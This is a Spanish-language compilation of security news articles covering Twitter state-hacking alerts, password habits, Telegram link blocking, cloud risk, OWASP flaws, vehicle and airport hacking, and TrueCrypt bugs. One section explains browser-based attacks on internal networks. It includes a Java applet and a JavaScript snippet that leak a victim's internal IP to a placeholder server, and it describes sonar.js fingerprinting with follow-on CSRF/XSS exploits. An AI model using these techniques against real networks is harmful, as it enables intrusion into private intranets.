Twitter advierte a usuarios de ataques patrocinados por Gobierno


Un número relativamente pequeño de usuarios de Twitter, incluyendo algunos conectado a la seguridad y defensa de la privacidad, han sido informados que sus cuentas han sido blanco de hackers patrocinados por el Estado.

Las notificaciones comenzaron a aparecer en las bandejas de entrada de los usuarios afectados, hace unos días, con muy poca información concreta que acompaña a la advertencia.

Twitter dijo en la notificación que los hackers están posiblemente asociados con "un gobierno", y estaban tratando de robar direcciones de correo electrónico de los usuarios, direcciones IP y números de teléfono conectados a sus cuentas. No está claro si Twitter se vio comprometido, o si las cuentas fueron atacadas individualmente.
"En este momento, no tenemos ninguna evidencia de que obtuvieron información de su cuenta, pero estamos investigando activamente este asunto", dijo Twitter. "Nos hubiera gustado tener más detalles para compartir, pero no tenemos ninguna información adicional que podemos ofrecer en este momento."

Muchos de los notificados tenían lazos sueltos a activismo y privacidad, incluyendo un activista con sede en Minnesota llamada Cassie que dirige CryptopartyMN.

"He sido técnica y política desde que era joven, y sospecho que podría ser amenazante para algunos en el poder", dijo. "La pregunta, por supuesto es, ¿a quién?

"Me gustó que hayan enviado esta notificación; Sin embargo, hubiera sido agradable que Twitter enviara más información sobre la naturaleza de los ataques y por qué sospechan que son 'actores patrocinados por el Estado' ", dijo Cassie. "Puedo entender que actualmente están investigando y no quieran revelar esa información ahora, pero creo que es esencial para aquellos de nosotros que recibimos las notificaciones saber para evaluar adecuadamente el riesgo."
Un equipo de la tecnología sin fines de lucro llamada coldhak en Canadá fue uno de los primeros en revelar que fue atacado. Motherboard informó que coldhak especula que podría haber un número de razones por las que fue objeto, incluido el fundador Colin Childs tiene contratos con el Proyecto Tor o que la empresa opera una serie de repetidores Tor. La cuenta individual de Childs también recibió una advertencia, dijo Motherboard.


Runa Sandvik, una investigadora de privacidad y seguridad y ex desarrolladora del Proyecto Tor, también recibió una notificación.

"La notificación no fue de mucha ayuda. El mensaje indica que mi cuenta puede haber sido blanco, pero no dice mucho acerca de lo que puedo o debo hacer a continuación, "dijo Sandvik. "¿Debo cambiar mi contraseña? ¿Mi correo electrónico? ¿Mi número de teléfono? No lo se. Mientras tanto, se trata de los primeros casos conocidos de Twitter advirtiendo a sus usuarios de ataques dirigidos".

Ella se mostró crítica con la recomendación de Twitter de que las víctimas usen Tor en la Web, porque ella dice que la red social con frecuencia bloquea sus usuarios.

"Twitter sugiere que use Tor para proteger mi identidad en línea. Sin embargo, los usuarios que se conectan a Twitter desde Tor y que deciden no dar a Twitter su número de teléfono a menudo encuentran que sus cuentas han sido bloqueadas ", dijo Sandvik. "Twitter afirma que no bloquea Tor, pero no parece que estar haciendo mucho para ayudar a los usuarios de Tor tampoco."

Cassie expreso comentarios similares a Sandvik.

"Me pareció que su sugerencia de usar Tor es algo graciosa o irónica, no porque sea una mala sugerencia, sino porque Twitter bloquea regularmente a los usuarios de Tor porque está marcado el tráfico como sospechoso", dijo Cassie. "Luego, para recuperar el acceso, Twitter pide los números de teléfono de los usuarios. Ahora, se nos dice que los números de teléfono pueden haber sido blanco de estos ataques ".

Facebook, en octubre, anunció que comenzaría a notificar a los usuarios de los ataques de gobierno, que debido a su complejidad, requieren atención inmediata.

Facebook dijo que sólo emitiría tales advertencias donde la evidencia apoya firmemente sus conclusiones, sin embargo, no iba a compartir la forma en que determina que los atacantes patrocinados por el Estado están detrás de una intrusión. Facebook también ofreció a las víctimas una mitigación técnica; encender una característica llamada LoginApprovals con el que alerta al dueño cuando una cuenta es accedida de un nuevo dispositivo o navegador.

¿Utilizan una contraseña para todas sus cuentas?


computerworld.- Una encuesta realizada por Kaspersky Lab revela que muchas personas todavía no son lo suficientemente cuidadosas con sus contraseñas. De hecho, un 14% aún tiene una sola contraseña para todas las cuentas, poniendo así en riesgo todas sus cuentas.
El nivel de riesgo no es mucho menor para los que utilizan unas pocas contraseñas para un gran número de cuentas, un 36%, o los que usan variaciones del mismo patrón de contraseña, un 12%. Lo que complica aún más la situación es que, según otra encuesta de Kaspersky Lab, 1 de cada 10 usuarios utiliza contraseñas con menos de ocho caracteres de longitud, mientras que el 12% no trata de hacer sus contraseñas más difíciles de adivinar usando, por ejemplo, letras mayúsculas, números mezclados con letras, signos de puntuación u otros trucos similares.
Para empeorar las cosas, el estudio también revela que los usuarios tanto domésticos como profesionales están poniendo en riesgo la seguridad mediante el almacenamiento de sus contraseñas en lugares de fácil acceso o no seguros. El 57% admitieron que mantienen sus contraseñas en un papel, en sus teléfonos, en archivos de texto de sus equipos, o las guarda en el navegador. Y cuando el navegador ofrece guardar un inicio de sesión y contraseña, un 36% están dispuestos a aceptar, dejándolos así en manos de los ciberdelincuentes o personas deshonestas que pueden apoderarse de su dispositivo.
Esta actitud descuidada hacia las contraseñas puede explicarse por muchos usuarios están convencidos de que no tienen información confidencial almacenada en sus ordenadores. Esto es lo que cree el 27% de los encuestados, sin darse cuenta de que las contraseñas y nombres de usuario son en sí mismas son un objetivo favorito de los cibercriminales. Además, un estudio más reciente de Kaspersky Lab mostró que el 73% de los usuarios prefiere revelar sus contraseñas que ir sin ropa interior. Como resultado, un alarmante 25% de los usuarios encuestados han tenido sus cuentas secuestradas en el último año.

¿Por qué Whatsapp esta bloqueando los enlaces de Telegram?


elpais.- Según los últimos datos revelados por Facebook, WhatsApp es la aplicación de mensajería más usada del mundo, con más de 900 millones de usuarios mensuales. Pero pese a esos números, estaría tomando acciones para limitar el acceso de sus usuarios a servicios de la competencia. 

Eso al menos es lo que se puede concluir luego de que WhatsApp desactivara los links compartidos en sus conversaciones que lleven a sitios de Telegram, otra aplicación de mensajería que -según indicó en mayo- tiene 62 millones de usuarios activos. 


La situación fue reportada por usuarios en Reddit, que llegaron a la conclusión de que la medida solo afecta a usuarios de Android. En términos prácticos, se ve reflejada en que cualquier dirección web compartida en WhatsApp que incluya la palabra Telegram no es activada como un link, haciendo más difícil el acceso a ella (aunque todavía queda disponible para copiarla y abrirla en un navegador). 
Hasta ahora, los representantes de WhatsApp no han comentado acerca de esta situación, pero según indicó un ingeniero de Telegram al portal The Verge, la acción habría sido aplicada a través de una actualización interna del servicio. 

Esta no es la primera vez que Facebook, compañía dueña de WhatsApp, aplica una acción así. Hace algunas semanas se hizo conocido el caso de Tsu, una red social que ofrece pagar a sus usuarios, y cuyos links también estaban siendo bloqueados en la red social de Mark Zuckerberg. 
¿Pero por qué podría Whatsapp tener tanto miedo de Telegram? Es que aunque no se ha popularizado aún, se trata de una app de mensajería que ofrece una serie de funcionalidades que hasta ahora Whatsapp no tiene. Veamos cinco de estas funcionalidades. 
1. Chats secretos para conversaciones confidenciales 
Si tienes algo confidencial que contar, posiblemente WhatsApp no es la mejor opción. Cada cierto tiempo hackers de todo el mundo encuentran vulnerabilidades que permitirían interceptar los mensajes. 

Para evitar este problema, Telegram cuenta con la opción de chats secretos, que son conversaciones iguales a las normales pero que se encuentran protegidas por medio de algoritmos de cifrado, que no pasan por los servidores de la aplicación. Además, existe la función de que estos se autodestruyan después de un tiempo. 

2. Buscar fotos en Internet desde la app 
Cuando se quiere enviar una imagen a través de WhatsApp y no la tenemos en el celular, debemos salir de la app para entrar al navegador, guardar la imagen en el smartphone y luego usarla en la aplicación. Telegram, en cambio, incluye su propio buscador de imágenes integrado. Solo se debe introducir las palabras clave para buscar la fotografía, incluso si son GIF. 

3. También tiene stickers 

Ahora los emojis, o emoticones, son comunes en WhatsApp y otras apps, y los stickers son comunes en LINE o Facebook Messenger. Telegram no solo permite emplear stickers para tus conversaciones, sino que además deja descargar y gestionar múltiples colecciones de ellos, e incluso diseñar una colección propia. 

4. Más seguridad 
Telegram se ha promocionado siempre como la alternativa segura de WhatsApp. Por ello incluye varias funcionalidades que buscan proteger las conversaciones, como ocultar el estado a personas concretas, poner una contraseña extra para acceder a las conversaciones o habilitar la verificación en dos pasos. 

5. Grupos más grandes 
En WhatsApp se pueden crear grupos de hasta 100 personas cada uno, pero si deseas incluir más, Telegram te ofrece aumentar el límite de personas de 200 a 800.

¿Es más segura la nube? Solo tu tienes la respuesta


welivesecurity.- ¿Estás considerando usar servicios en la nube pero tienes miedo de que no sea lo suficientemente segura? No eres el único. No importa lo grande o pequeña que sea la empresa: todas las empresas (pequeñas, medianas y grandes) tuvieron sus dudas cuando pensaron en adoptar servicios en la nube, por temor a que sus datos confidenciales puedan verse afectados al almacenarse online. ¿Pero el riesgo es demasiado elevado o se puede llegar a manejar?

Como lo demuestran las estadísticas, a más de la mitad de todas las grandes empresas y a un tercio de las pequeñas y medianas empresas en Europa les preocupan los posibles problemas de seguridad cuando llega el momento de transferir sus operaciones a la nube. De hecho, esta inquietud encabeza la lista de preocupaciones de seguridad, por sobre otras cosas como la localización de sus datos y las posibles dificultades que podrían enfrentar al tratar de acceder a la información bajo demanda.
Como octubre es el Mes de Seguridad Cibernética en Europa, trataremos de analizar con mayor detalle si estos miedos están justificados o no.

En primer lugar, tenemos que admitir que ningún sistema es perfectamente seguro, y esto también se aplica a la nube. Sin embargo, para algunas empresas con presupuestos más ajustados y menos capacidad de personal, una solución en la nube de hecho podría mejorar la seguridad, ya que es posible que el proveedor de la nube tenga más recursos dedicados a la protección del sistema y a la gestión de posibles brechas de seguridad en forma rápida y eficaz que la empresa misma. Sin embargo, esto no es una regla, y aunque la información podría estar más segura online, la manipulación durante su uso a nivel local también debe manejarse con sumo cuidado.

Además, los cibercriminales están usando las mismas estrategias para tratar de infiltrar la nube o el hardware local. Por lo tanto, incluso cuando los servidores de la nube del proveedor sean un objetivo más tentador ya que contiene los datos de decenas e incluso cientos de empresas, esto no cambia los tipos de amenazas a los que se enfrentan los datos en ambas situaciones. Entonces, para responder a nuestra pregunta decimos: sí, elegir servicios en la nube trae aparejados algunos riesgos, pero pueden mitigarse si se gestionan los recursos adecuadamente.

Para ser más específicos, las medidas de seguridad determinadas en el contrato (llamado Contrato de Nivel de Servicio o SLA, por sus siglas en inglés) con el proveedor es una de las cosas que siempre hay que tener en cuenta. Si tu empresa adoptó un estándar de alta seguridad, utiliza una solución de software confiable y aplica otras estrategias de protección efectivas, como la verificación en dos pasos o el cifrado de datos, todas estas medidas se pueden seguir manteniendo al pasar a la nube.

También tienes otras opciones, como realizar una auditoría de seguridad para asegurar que tu proveedor de servicios en la nube está cumpliendo con todas las condiciones de seguridad que prometió en el contrato. De lo contrario, se pueden imponer sanciones. Sin embargo, la mayoría de las medidas mencionadas arriba solo sirven en el momento en que se lleva a cabo la brecha de seguridad, lo que ya podría haber ocurrido.
Antes de transferir tu negocio a la nube, debes hacerte algunas preguntas.

¿Tu empresa o al menos la parte principal de tu empresa está sujeta a normativas?

Muchas industrias, como la sanitaria o financiera, siguen reglas estrictas cuando se trata del almacenamiento de datos. Es más, muchas organizaciones hasta tienen prohibido almacenar datos en otros países. En estos casos de normativas estrictas, debes verificar que tu empresa sea capaz de cumplir con las condiciones requeridas.

¿Conoces el valor de todos tus activos?

Como mínimo, identifica y clasifica al menos las partes más críticas de la información que piensas guardar en la nube (por ejemplo, los datos contables o la información privada de los clientes). Ahora imagina que pierdes acceso a ellos por varias horas o días. ¿Tu empresa sería capaz de sobrellevar esta situación o es necesario contar con un nivel de seguridad mayor? De ser así, quizá sea mejor que los datos se queden en la empresa.

¿Cómo se protegen los datos durante su transferencia entre la nube y los dispositivos corporativos?

El cifrado de todos los datos cuando están almacenados en la nube y durante las transferencias (más allá de que se trate de un equipos de escritorio, un equipo portátil, un teléfono móvil o una tableta) es esencial para mantener la información a salvo.

¿Puedes controlar quién está accediendo a tus datos?

Si quieres evitar que usuarios no autorizados miren tus archivos y tu información confidencial, debes verificar quién tiene permiso de acceso a los datos almacenados en la empresa así como en la nube. Asimismo, cuando hay varios empleados editando un archivo, debes poder identificar quién hizo cada cambio.

¿Qué pasa si hay una brecha de seguridad en los sistemas de la nube?

¿Tu empresa es capaz de absorber los daños causados a la marca? Y aquí no estoy hablando de las responsabilidades financieras, que probablemente ya formen parte del Contrato de Nivel de Servicio. Lo que quiero decir es que, si los datos se pierden o son robados, tus clientes no van a seguir confiando en tu proveedor de la nube en el futuro.

Mejora la seguridad de tus aplicaciones con estas 3 recomendaciones


welivesecurity.- En el mundo acelerado de hoy, los desarrolladores de software a menudo deben trabajar bajo presión, sobre todo cuando se trata de proyectos con plazos muy estrictos (o de pedidos hechos sin la antelación necesaria).

Sin embargo, estos “trabajitos rápidos” a veces se pagan caro, ya que pueden filtrarse fallas o vulnerabilidades no deseadas en el código. Pero hay maneras de mitigar estos riesgos, como tener procedimientos adecuados de control de calidad, utilizar procesos y herramientas de prueba bien definidos, y educar a los programadores para que apliquen el enfoque llamado “seguro por diseño”.
Incluso hoy en día, un gran número de desarrolladores de software no se están fijando en la seguridad como deberían. Algunos nunca recibieron una capacitación adecuada sobre prácticas de desarrollo seguro por parte de sus empleadores, mientras que otros tratan de acelerar el trabajo utilizando código de terceros (lo que no está mal, pero podría contener errores no detectados).

Todo esto, sumado al hecho de que los clientes prefieren una entrega rápida por sobre la seguridad, hace que la creación de software seguro sea más difícil de lograr.

Esto también afecta a los usuarios. Algunas fallas son tan graves que le permiten a un atacante robar datos confidenciales, secuestrar una sesión, e incluso hacerse pasar por la víctima. Sin embargo, existen ciertas recomendaciones para los desarrolladores que podrían ayudar a evitar algunos de estos problemas, para ser más específicos, mediante la aplicación de las prácticas “seguro por diseño”.

Para empezar, el enfoque “seguro por diseño” anima a los desarrolladores a crear sus aplicaciones pensando en la seguridad. Se basa en tres principios que forman la base de la seguridad de la información:
  1. Los usuarios solo pueden tener acceso a los datos para los que tienen permiso.
  2. Los sistemas deben garantizar que los usuarios no autorizados no puedan manipular ni alterar datos.
  3. Los sistemas deben otorgarles a los usuarios autorizados acceso a los datos cuando lo necesiten.
La Fundación OWASP (Proyecto Abierto de Seguridad de Aplicaciones Web), partidaria del enfoque “seguro por diseño”, tiene como propósito ayudar a los desarrolladores y a las empresas a crear y manejar aplicaciones confiables para los usuarios. Para ello, publica las vulnerabilidades más comunes de modo que cualquier persona pueda identificarlas cuando las encuentra online. Éstas son las primeras tres:

1. Las Fallas de inyección, que afectan consultas SQL, comandos del sistema operativo, entre otros, es la número uno.

Ejemplo: En un sistema vulnerable, el atacante inserta un script en el formulario de inicio de sesión como reemplazo de una cuenta de datos legítima (como el nombre de usuario y la contraseña). El intérprete (un programa que el usuario no puede ver, pero que está llevando a cabo las instrucciones dadas) ejecuta el comando no deseado y le permite al atacante acceder a los datos en el sistema host, robarlos, alterarlos, denegar el acceso o, en el peor de los casos, tomar el control absoluto.

2. La Pérdida de autenticación y gestión de sesiones es otra falla muy extendida y comúnmente aprovechada por los atacantes, mediante la cual una aplicación Web no logra proteger los datos confidenciales.

Ejemplo: El usuario se identifica (por lo general) proporcionando un nombre de usuario y una contraseña, y recibe un ID de sesión de la aplicación vinculado a sus credenciales. Sin embargo, si la conexión no está cifrada, un atacante podría utilizar un ataque de interceptación de tipo man-in-the-middle para capturar los datos confidenciales transferidos. Los usuarios malintencionados también pueden secuestrar la sesión o, peor aún, hacerse pasar por la víctima mediante el uso no autorizado del ID de sesión que aparece en la URL.

3. La Secuencia de comandos en sitios cruzados (también conocida como XSS), es otra vulnerabilidad muy común. Le permite al atacante comprometer la cuenta de un usuario o tomar control de ella para extraer sus datos. El atacante también puede redirigir a la víctima a una página maliciosa o instalar malware en su sistema.

Ejemplo: El usuario recibe un correo electrónico o un mensaje en los medios sociales, que contiene un vínculo malicioso. Cuando la víctima hace clic en él y es redirigida al sitio, se ejecuta un script incrustado por el atacante que le permite secuestrar la sesión del usuario o extraer datos desde el sitio.

Policía: ¡Deja de publicar fotos de sus hijos en las redes sociales!


Policía en Alemania creó un éxito viral esta semana publicando un llamado urgente para que la gente deje de robarle la privacidad a sus hijos.

La apelación, de la policía en Hagen, fue publicada, muy apropiadamente, en Facebook.

Fue publicada el martes y para el viernes por la mañana, había sido compartida por más de 245.000 personas.

En la publicación, la policía de Hagen señaló que la gente publica libremente en Facebook fotos de niños mientras andan en una piscina o en la playa, como si no hubiera consecuencias para la publicación de dichas imágenes.
Traducción de la publicación:

Tal vez te parezcan muy bonitas las fotos hoy, pero tu hijo las encontrará vergonzosas en un par de años. O hijo podrían ser usadas para recibir bullying. Lo que es peor: un pedófilo podría utilizar esas fotos para sus fines, publicarlas en otro lugar.

Ya sabemos que el padre promedio es como un voraz paparazzi pero amorosa, que sube en promedio unas 973 fotos de sus hijos en las redes sociales para el momento en que él o ella llegue a la edad de 5 años, como ha reportado el sitio de seguridad en línea The Parent Zone.

Aplaudimos la policía Hagen.

De hecho, el estudio de The Parents Zone - hecho en nombre de la campaña de seguridad knowthenet - encontró que el 17% de los padres nunca ha revisado su configuración de privacidad de Facebook en absoluto, mientras que casi la mitad (46%) sólo ha comprobado una o dos veces, a pesar de que Facebook es el lugar número uno para compartir fotos de niños.
Así que la próxima vez que veas alguna imágen no apropiada de algun niño siendo publicada por todas partes, no sólo te alejes.

No comentes que se ve hermoso(a).

Educalos. Diles en qué aplicaciones y sitios sus hijos nunca deben estar.

Definitivamente debemos darles consejos sobre cómo hacer que su cuenta de Facebook sea más seguro.

¿Quién sabe? Tal vez ese pequeño dinosaurio azul de la privacidad en Facebook que salió el año pasado puede salvar niños de acoso y abuso en el futuro.

Primer arma anti-Drone que derriba los UAV con ondas de radio


¿Qué hacer cuando los drones suponen un problema de seguridad? Battelle ya ha preparado su rifle anti-drones capaz de desactivarlos en el aire.

Los drones ya son parte de nuestra vida y más que lo serán en los próximos años. Ya hay modelos para todos los gustos y necesidades, desde los más grandes y potentes hasta auténticos drones de bolsillo.
Del mismo modo, ya son utilizados por las empresas para distintas operaciones, como repartir el correo o por el propio ejército como sistemas de vigilancia o entrega de suministros. Sin embargo, los drones también pueden presentar una amenaza.

DroneDefender, el rifle anti-drones que los paraliza en el aire

Ya hemos visto incidentes como el drone que se coló (y estrelló) durante un partido del US Open y, como es normal, no es muy gracioso que un cacharro no identificado entre en instalaciones privadas. Rápidamente las empresas de seguridad están sacando soluciones y ahora Battelle tiene su propio sistema de desactivación portátil.


Se llama DroneDefender y es un “arma” que parece sacada de una película de los Cazafantasmas. Mediante pulsos de radio, es capaz de crear interferencias en las conexiones del drone, pudiendo desactivarlo hasta en un radio de 400 metros.
Esta “rifle” hace creer al drone que ha perdido la comunicación con su controlador y entra en el modo de aterrizaje de emergencia, descendiendo poco a poco hasta tocar tierra.

DroneDefender es ligero y se comercializará a partir de 2016, ya hay varias agencias gubernamentales interesadas.

¿Cómo hackear y explotar una red interna e IPs privadas?



Según una encuesta llevada a cabo por una empresa de seguridad informática, la mayoría de las personas creen que mientras se navegan por la Web que están protegidas por firewalls y redes aisladas a través de direcciones privadas del IP NAT. Con este entendimiento, asumimos la seguridad de los sitios web de intranet y las interfaces basadas en routers, cortafuegos, impresoras, teléfonos IP, sistemas de nómina, etc., aunque dejamos sin parchear. Pensamos que permanecen seguro dentro de la zona protegida y nada es capaz de conectar directamente desde el mundo exterior, ¿no?

Bueno, no del todo. Los navegadores web pueden ser completamente controlados por cualquier página web, lo que les permite atacar los recursos de la red interna de acuerdo con profesores de formación de hacking ético. El navegador web de cada usuario en una red empresarial se puede cambiar en un trampolín para los intrusos sin soluciones de seguridad perimetral avanzados.

Cómo alguien puede explotar la red interna

Un experto de una empresa de seguridad informática explica los procedimientos para explotar la red interna:

  • Una víctima visita una página web maliciosa, que asume el control de su navegador Web. La página web maliciosa podría ser cualquiera página web, atada con un ataque XSS permanente que hackers utilizan para la entrega de malware masivo.
  • Cuando se ejecuta el malware, lo hace desde la perspectiva de la intranet de la víctima, donde nadie puede acceder directamente. Esto quiere decir que el navegador web de la víctima puede ser instruido para entregar su dirección de NAT IP y hacer conexiones en la red interna en nombre del atacante o víctima.
  • El malware utiliza navegador web de la víctima como una plataforma de lanzamiento, donde el malware hace los análisis de puertos, fingerprinting de los servidores web en la red interna y revisa las soluciones de seguridad perimetral implementadas.
  • El malware inicia los ataques contra los objetivos internos y la información comprometida se envía fuera de la red para la colección.

Es fácil a obtener la dirección IP pública de un navegador web desde el servidor web, pero la dirección IP interna es poco difícil menciona profesores de formación de hacking ético. Esta es la pieza de información que necesitamos para comenzar a explorar y explotar intranet. Para obtener IP interna, tenemos que invocar Java en un navegador y un applet. Eso es una forma sencilla de hacerlo. El siguiente código carga el MyAddress.class y luego abre la URL de

http://webserver/dirección_ip.html?nat = XXXX

<APPLET CODE=”MyAddress.class”>
<PARAM NAME=”URL” VALUE=”http://webserver/ip_address.html?nat=”>
</APPLET>

Si el navegador web de la víctima es un Mozilla/Firefox, es posible omitir el requisito subprograma e invocar un socket de Java directamente desde el JavaScript.

function natIP() {
var w = window.location;
var host = w.host;
var port = w.port || 80;
var Socket = (new
java.net.Socket(host,port)).getLocalAddress().getHostAddress();
return Socket;
}

Framework para explotar la red interna

Sonar
Sonar.js es un marco que utiliza JavaScript, WebRTC, y algunas funciones onload para detectar dispositivos internos en una red. sonar.js funciona mediante la utilización WebRTC para enumerar hosts en vivo en la red interna. Mike Stevans profesor de formación de hacking ético explica que tras enumerar las direcciones internas sonar.js intenta vincular a los recursos estáticos como CSS, imágenes y JavaScript, mientras que conecta el controlador de eventos onload. Si carga los recursos con éxito e inicia el evento onload entonces sabemos que el anfitrión tiene este recurso.
¿Por qué es útil saber? Al obtener una lista de los recursos alojados en un dispositivo, podemos intentar hacer fingerprinting de los dispositivos y soluciones de seguridad perimetral.





Cómo funciona Sonar?
Al cargar el payload de sonar.js en un navegador web moderno sucederá lo siguiente:
  • sonar.js utilizará WebRTC para enumerar las IPs internas que tiene el usuario
  • sonar.js luego intenta encontrar otros hosts vivos en la red interna a través de webSockets.
  • Si no se encuentra una gran cantidad en vivo, sonar.js comienza a intentar hacer fingerprinting mediante la vinculación a ella a través de
<img src=”x”> y <link rel=”stylesheet” type=”text/css” href=”x”>
y enganchar el proceso de onload. Si el recurso carga con éxito se activará un evento para lanzar el exploit acuerdo con resultados de fingerprinting.
Sonar.js trabaja sobre una base de datos de fingerprints. Fingerprint es simplemente una lista de los recursos conocidos en una red que se pueden vincular a y detectados a través onload. Ejemplos de esto incluyen imágenes, hojas de CSS style, e incluso JavaScript externo.


De acuerdo con expertos de empresas de seguridad informática, mediante la creación de sus propias fingerprints se pueden construir exploits personalizados que serán lanzados contra los dispositivos internos una vez que son detectados por sonar.js. Exploits comunes incluyen cosas como la Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. La idea es que usted puede utilizar estas vulnerabilidades para hacer cosas tales como modificar configuraciones DNS del router, el sacar archivos desde un servidor de archivos interno, y más.

Mediante el uso de sonar.js pentesting puede construir exploits contra los servidores internos de registro, routers, impresoras, teléfonos VOIP, y más menciona expertos de soluciones de seguridad perimetral . Debido a las redes internas a menudo están menos vigiladas, ataques como CSRF y XSS pueden ser de gran alcance para hacerse cargo de las configuraciones de los dispositivos internos de una red.

Hackers demuestran al departamento de Policía de EE.UU. que sus vehículos pueden ser hackeados


Los investigadores de seguridad Chris Valasek y Charlie Miller ayudaron al mundo a entender que los vehículos de último modelo son vulnerables a los ataques cibernéticos.
hackread.- Hemos leído sobre como computadoras de la policia son hackeadas o caen victimas de ransomware y todo eso, pero, ¿Se puede hackear sus autos? Eso es algo que no nos esperábamos.

Posterior a el asombroso escándalo de hack a Chrysler, ahora ha salido a la luz que la mayoría de los vehículos de la policía también son vulnerables a los ataques cibernéticos.

Miller y Valasek han detectado previamente vulnerabilidades en Ford Escape en 2013. Durante ese secuestro en particular, el dúo de la investigación lo estrelló contra las hierbas en un estacionamiento desocupado. Lograron secuestrar los sistemas de la patrulla de la policía estatal.

Este hack en específico se centra principalmente en los autos de policía estacionados. El hacker podría infiltrarse en los sistemas internos del vehículo y hacer que el operador del vehículo no pueda hacer el cambio de estar estacionado a conducir. Luego después pueden hacer que las RPM lleguen a su máximo acelerándolo, sin tener ningún pie en el pedal.

Luego trabajan sobre el sistema para asegurarse que el motor sea apagado.

El oficial practicamente queda atascados sin una manera de ir a ninguna parte - lo que les deja en situaciones potencialmente peligrosas para su vida. Pero no te preoccupes demasiado por las consecuencias del mundo real. Ford explicó que este truco se hizo bajo circunstancias extremas y llevado a cabo por profesionales.

Cosas como una incontrolable bocina o la manipulación de las pausas y velocidades de los automóviles, spoofing del sistema GPS, la manipulación de cuentakilómetros y velocímetro, así como comprometedores cambios de dirección fueron realizados mediante el envío de un conjunto de comandos.



En julio de 2015, un par de senadores estadounidenses, Edward Markey y Richard Blumenthal mostraron su preocupación por la seguridad de los vehículos, así como los controladores y pidieron mayor seguridad y protección a sobre los vehículos.

Dijeron que las vulnerabilidades como estas pueden poner a los conductores en una situación potencialmente mortal.

Ambos senadores aprobaron una ley conocida como "SPY Car Act", que permitiría a la Comisión Federal de Comercio (FTC) y la National Highway Traffic Safety Administración (NHTSA) garantizar la seguridad de los datos del vehículo, así como el conductor al volante .

¿Sigues usando TrueCrypt? ¡Cuidado con estas 2 fallas críticas!


El experto en seguridad James Forshaw ha descubierto dos fallas críticas en el controlador que TrueCrypt instala en sistemas Windows.

securityaffairs.- Malas noticias para los usuarios de Windows que han decidido utilizar TrueCrypt para cifrar sus discos duros, el investigador James Forshaw, un miembro del equipo del Proyecto Zero de Google, ha descubierto dos vulnerabilidades graves que afectan a la popular aplicación.

A pesar de que el mantenimiento de TrueCrypt se ha interrumpido en de mayo de 2014 por sus desarrolladores, es una de las aplicaciones más populares para el cifrado de datos de usuario.
Los autores originales de TrueCrypt advirtieron a los usuarios sobre la posible presencia de "cuestiones de seguridad sin resolver" y los invitó a migrar a BitLocker, la solución de cifrado de disco completo implementada por Microsoft.

James Forshaw ha descubierto dos fallas en el controlador que TrueCrypt instala en sistemas Windows.

Es curioso observar que ninguna de las auditorías previas ha puesto al descubierto ninguna de estas fallas en la aplicación TrueCrypt. En particular, un equipo de investigadores realizó un análisis que duró dos años y que se organizó en dos fases distintas. En la primera fase los expertos analizaron los planos del software y descubrieron sólo 11 temas de severidad media y baja en el software.

En la segunda fase, que finalizó recientemente, los expertos examinaron la implementación de TrueCrypt para generar números aleatorios y algoritmos de clave críticos, y varios conjuntos de suites de cifrado.


Auditores de seguridad y expertos en criptografía de la NCC decidieron analizar el software TrueCrypt en respuesta a los documentos filtrados por Edward Snowden que hipotéticamente planteaban la presencia de una puerta trasera en la aplicación.
TrueCrypt parece ser una pieza de software criptográfico relativamente bien diseñada; el experto en criptografía Matthew Green explicó en una entrada de blog. La auditoría NCC no encontró evidencia de puertas traseras deliberadas, o cualquier defecto de diseño graves que hiciera insegura cualquier instancia del software en la mayoría de los casos.
Ahora, Forshaw explica que un atacante puede explotar la vulnerabilidad para obtener privilegios elevados en un sistema si tienen acceso a una cuenta de usuario limitada.

Forshaw no ha revelado los detalles sobre las dos vulnerabilidades porque él tiene la intención de esperar siete días para el descubrimiento o el lanzamiento de una actualización de seguridad para solucionar el problema.

¿Quién va a solucionar las fallas en TrueCrypt?

Seguro que estos bugs no serán corregidos por los autores originales, sin embargo la vulnerabilidad (CVE-2015-7358 y CVE-2015-7359) parecen haber sido corregidas en VeraCrypt, un spin-off del proyecto original TrueCrypt.

VeraCrypt 1.15 que fue lanzado la semana pasada contiene los parches para las dos vulnerabilidades descubiertas por Forshaw, así como para otros bugs.

Los usuarios que aún utilizan TrueCrypt deben comenzar a utilizar VeraCrypt para evitar problemas, sus desarrolladores ya han solucionado muchos problemas de seguridad que afectan al software original.

Hackeando Sistemas de Seguridad en los Aeropuertos con una Laptop

Los hackers pueden comprometer las redes de seguridad de los aeropuertos mediante el uso de una laptop común, según el descubrimiento desconcertante del experto Billy Rios.


La firma de seguridad I-Team revelado que hackers podrían tener la capacidad de apagar la red de seguridad de un aeropuerto simplemente utilizando una computadora portátil.

Es vergonzoso leer que este sistema diseñado para mejorar la seguridad de los aeropuertos podría representar el punto de entrada para los atacantes.

"Revisando estos dispositivos y sabiendo lo mal asegurados que están, no se ve nada bien", explicó el experto en seguridad cibernética Billy Rios. "Es bastante malo - Probablemente no se ha pensado en seguridad cibernética en absoluto."

En 2013, Billy Rios probo varias máquinas desplegadas en aeropuertos en todo el mundo descubriendo numerosas vulnerabilidades de seguridad. La lista de máquinas evaluadas incluye un escáner de rayos X, un detector de explosivos, también conocido como Itemiser, y un reloj de tiempo.
Ríos explicó que las vulnerabilidades que afectan a la máquina podrían ser explotadas para acceder a la red del aeropuerto, por ejemplo, es muy común descubrir contraseñas guardadas en el software que se ejecuta en estos sistemas de seguridad.

"Así que cualquiera que sepa el nombre de usuario y contraseña, el cual sabemos, apenas pudo iniciar sesión en el dispositivo y obtener acceso a una red de aeropuertos", dijo Ríos. "Sólo hace falta un segundo para abusar de algunas de las vulnerabilidades que hemos visto."

El acceso no autorizado a una máquina de rayos X podría ser aprovechado por un terrorista o un criminal para ocultar armas de los inspectores.


Ríos informó las fallas a las autoridades estadounidenses que llevaron al Departamento de Seguridad Nacional a emitir una advertencia sobre las vulnerabilidades de contraseñas en algunas máquinas de detección de explosivos. Según NBCNewYork, Ríos ha encontrado muchas otras fallas en el Itemiser y en los relojes de tiempo.

"Una máquina examinada por Rios se llama Itemiser. La empresa que fabrica itemisers dice que la versión que Ríos verifico fue utilizada solamente en los aeropuertos extranjeros y la compañía recientemente lanzó una actualización para corregir el defecto.

Ríos mantiene la preocupación más amplia continúa en los aeropuertos nacionales, en las que dice que encontró tres relojes con contraseñas vulnerables. "Afirma el NBCNewYork.

La empresa que produce los relojes de tiempo ya han arreglado los defectos y el personal en los aeropuertos ahora puede cambiar las contraseñas.

El aspecto más desconcertante de la historia es que probablemente las vulnerabilidades descubiertas por Ríos ya han sido explotadas, esta es la opinión del estratega de seguridad cibernética de Cylance, Jon Miller.

